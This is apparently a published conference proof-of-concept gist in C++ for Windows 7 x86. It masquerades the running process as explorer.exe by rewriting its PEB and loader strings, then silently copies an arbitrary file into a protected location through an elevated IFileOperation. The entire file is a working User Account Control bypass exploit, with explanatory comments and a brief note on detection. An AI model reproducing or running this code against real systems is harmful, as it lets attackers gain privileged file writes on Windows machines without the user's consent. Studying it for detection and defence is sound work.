@aaaddress1
Last active May 3, 2024 22:09
sysDoor: masqueradePEB + iFileOperation
//
// SITCON 2020 PoC for Windows 7 x86
// Author: [email protected]
// cite: github.com/liuxigu/bypassuac/blob/master/bypassuac/bypassuac.cpp
//
#include <Shobjidl.h>
#include "windows.h"
#include "winternl.h"
#include <iostream>
using namespace std;
// Returns the base address of the current process's PEB, or a null PPEB on failure.
//
// NtQueryInformationProcess is resolved from ntdll at run time rather than imported.
// The process opens a handle to its own PID and asks for ProcessBasicInformation;
// the PebBaseAddress member of the returned PROCESS_BASIC_INFORMATION is the result.
//
// As written:
//  * PROCESS_ALL_ACCESS is requested although only a query is performed;
//  * the ntdll module handle is never released (no FreeLibrary) and ntqip is not
//    checked for NULL before being called;
//  * `return FALSE` converts 0 to a null PPEB, the same value the caller sees when
//    OpenProcess fails (ppeb is left NULL and returned after an unconditional
//    CloseHandle on the NULL handle).
PPEB fn_get_peb_via_NtQueryInformationProcess() {
    typedef NTSTATUS(WINAPI *NtQueryInformationProcess)(HANDLE, DWORD, PVOID, ULONG, PULONG);
    DWORD dwProcessId = GetCurrentProcessId();
    PROCESS_BASIC_INFORMATION processInfo;
    PPEB ppeb = NULL;
    HMODULE hLoadDll = LoadLibrary(L"ntdll.dll");
    NtQueryInformationProcess ntqip = (NtQueryInformationProcess)GetProcAddress(hLoadDll, "NtQueryInformationProcess");
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessId);
    if (hProcess != NULL) {
        // ProcessBasicInformation fills PROCESS_BASIC_INFORMATION; the trailing
        // ReturnLength out-parameter is not requested.
        NTSTATUS status = ntqip(hProcess, ProcessBasicInformation, &processInfo, sizeof(PROCESS_BASIC_INFORMATION), NULL);
        if (NT_SUCCESS(status)) {
            ppeb = processInfo.PebBaseAddress;
        }
        else {
            // Failure path: close the handle here because the shared CloseHandle
            // below is skipped by the early return.
            CloseHandle(hProcess);
            return FALSE; // 0 -> null PPEB
        }
    }
    // Reached with hProcess == NULL as well (OpenProcess failure); CloseHandle(NULL)
    // simply fails and ppeb is still NULL.
    CloseHandle(hProcess);
    return ppeb;
}
// Re-points an existing UNICODE_STRING at a different backing wide string.
//
// RtlInitUnicodeString is resolved from ntdll and applied to `name`: it sets
// name->Buffer to lpExplorePath and derives Length / MaximumLength from the
// source's length, so after the call `name` borrows lpExplorePath's storage and
// does not own a copy. The callers in wmain pass PEB-resident strings here
// (ProcessParameters->ImagePathName / CommandLine and the EXE's loader-entry
// names), so lpExplorePath must outlive the process's use of those fields --
// wmain supplies either a never-freed heap buffer or a string literal.
//
// As written, the ntdll handle is not released and pfnRtlInitUnicodeString is
// not checked for NULL before the call.
VOID fn_change_ProcessParameters_and_LDR(PUNICODE_STRING name, LPCWSTR lpExplorePath) {
    typedef VOID(WINAPI *RtlInitUnicodeString)(_Inout_ PUNICODE_STRING DestinationString, _In_opt_ PCWSTR SourceString);
    RtlInitUnicodeString pfnRtlInitUnicodeString = NULL;
    HMODULE hDll = LoadLibrary(L"ntdll.dll");
    pfnRtlInitUnicodeString = (RtlInitUnicodeString)GetProcAddress(hDll, "RtlInitUnicodeString");
    pfnRtlInitUnicodeString(name, lpExplorePath);
    // RtlInitUnicodeString rewrites Buffer, Length and MaximumLength in one step,
    // so no separate fix-up of the two length fields is needed here.
}
// Entry point (x86 / Windows 7 build per the file header).
//
// Step 1 rewrites the user-mode PEB so the process describes itself as
// <WindowsDir>\explorer.exe; step 2 copies argv[1] into the folder argv[2]
// through an IFileOperation flagged FOFX_REQUIREELEVATION.
//
// Argument handling as written: the usage check (argc == 1) runs only AFTER the
// PEB has already been rewritten, and argv[2] is read without checking
// argc >= 3 -- with exactly one argument destPath is argv's terminating NULL,
// `to` is never created and CopyItem receives a NULL destination. nArgs and
// lpParam are unused. lpExplorePath is never delete[]'d; its storage is in any
// case referenced by the PEB strings for the rest of the process.
int wmain(int argc, WCHAR** argv) {
    int nArgs = 0;
    LPWSTR *lpParam = NULL;
    LPWSTR lpExplorePath = new WCHAR[MAX_PATH];
    HRESULT hr = NULL; // 0 == S_OK
    PPEB ppeb = NULL;
    DWORD *dwpFullDllName = NULL, *dwpBaseDllName = NULL;
    // Build "<WindowsDir>\explorer.exe" in the MAX_PATH buffer (lstrcat is unbounded).
    GetWindowsDirectory(lpExplorePath, MAX_PATH);
    lstrcat(lpExplorePath, L"\\explorer.exe");
    ppeb = fn_get_peb_via_NtQueryInformationProcess();
    // Locate the executable's own name fields in the loader data. Offsets are the
    // 32-bit layout: PEB->Ldr at +0x0c, PEB_LDR_DATA.InLoadOrderModuleList at
    // +0x0c (its Flink is the first LDR_DATA_TABLE_ENTRY, which is the EXE's own
    // entry), FullDllName at +0x24 and BaseDllName at +0x2c of that entry. Only
    // addresses are computed here; the writes happen after the block.
    __asm {
        pushad
        mov eax, fs:[0x30] // PEB (TEB->ProcessEnvironmentBlock on x86)
        mov eax, [eax + 0x0c] // PEB->Ldr
        mov eax, [eax + 0x0c] // Ldr->InLoadOrderModuleList.Flink == first LDR_DATA_TABLE_ENTRY
        add eax, 0x24 // &entry->FullDllName
        mov dwpFullDllName, eax
        sub eax, 0x24
        add eax, 0x2c // &entry->BaseDllName
        mov dwpBaseDllName, eax
        popad
    }
    // Rewrite the four user-mode "who am I" strings: ProcessParameters'
    // ImagePathName and CommandLine, and the EXE's FullDllName / BaseDllName.
    // NOTE(review): ppeb is dereferenced without a NULL check, and the PEB read
    // here via NtQueryInformationProcess is the same PEB the asm block read
    // from fs:[0x30]. Only these PEB fields are touched -- the kernel's own
    // record of the image path is not modified by this code, so comparing the
    // PEB-reported path with the kernel-reported one is the obvious point of
    // detection for this kind of rewrite.
    fn_change_ProcessParameters_and_LDR(&ppeb->ProcessParameters->ImagePathName, lpExplorePath);
    fn_change_ProcessParameters_and_LDR(&ppeb->ProcessParameters->CommandLine, lpExplorePath);
    fn_change_ProcessParameters_and_LDR((PUNICODE_STRING)((unsigned char *)dwpFullDllName), lpExplorePath);
    fn_change_ProcessParameters_and_LDR((PUNICODE_STRING)((unsigned char *)dwpBaseDllName), L"explorer.exe");
    if (argc == 1) {
        wcout << "usage: " << argv[0] << " [path/to/file] [where/to/write]" << endl;
        return 0;
    }
    IFileOperation *fileOperation = NULL;
    LPCWSTR destPath = argv[2];
    LPCWSTR path = argv[1];
    // Tail of `path` after its last backslash. With no backslash find_last_of
    // returns npos and npos + 1 wraps to 0, so filename == path.
    LPCWSTR filename = &path[wstring(path).find_last_of('\\') + 1];
    hr = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE);
    if (SUCCEEDED(hr)) {
        hr = CoCreateInstance(CLSID_FileOperation, NULL, CLSCTX_ALL, IID_PPV_ARGS(&fileOperation));
        if (SUCCEEDED(hr)) {
            // FOFX_REQUIREELEVATION / FOFX_SHOWELEVATIONPROMPT ask the shell to run
            // the copy elevated; FOF_SILENT, FOF_NOCONFIRMATION and FOF_NOERRORUI
            // suppress progress, confirmation and error dialogs; FOFX_NOCOPYHOOKS
            // skips registered copy hooks. Whether an elevation prompt actually
            // appears is decided by the shell's auto-elevation policy, which is
            // presumably what the PEB rewrite above is aimed at (file title).
            hr = fileOperation->SetOperationFlags(
                FOF_NOCONFIRMATION |
                FOF_SILENT |
                FOFX_SHOWELEVATIONPROMPT |
                FOFX_NOCOPYHOOKS |
                FOFX_REQUIREELEVATION |
                FOF_NOERRORUI);
            if (SUCCEEDED(hr)) {
                IShellItem *from = NULL, *to = NULL;
                hr = SHCreateItemFromParsingName(path, NULL, IID_PPV_ARGS(&from));
                if (SUCCEEDED(hr)) {
                    // destPath is NULL when only one argument was given; `to` then
                    // stays NULL and is passed through to CopyItem as-is.
                    if (destPath)
                        hr = SHCreateItemFromParsingName(destPath, NULL, IID_PPV_ARGS(&to));
                    if (SUCCEEDED(hr)) {
                        // Queue "copy `from` into folder `to` under name `filename`";
                        // nothing is executed until PerformOperations below.
                        hr = fileOperation->CopyItem(from, to, filename, NULL);
                        if (NULL != to)
                            to->Release();
                    }
                    from->Release();
                }
                if (SUCCEEDED(hr)) {
                    hr = fileOperation->PerformOperations();
                }
            }
            fileOperation->Release();
        }
        CoUninitialize();
    }
    // hr is not reported: every failure path falls through to a silent exit 0.
    return 0;
}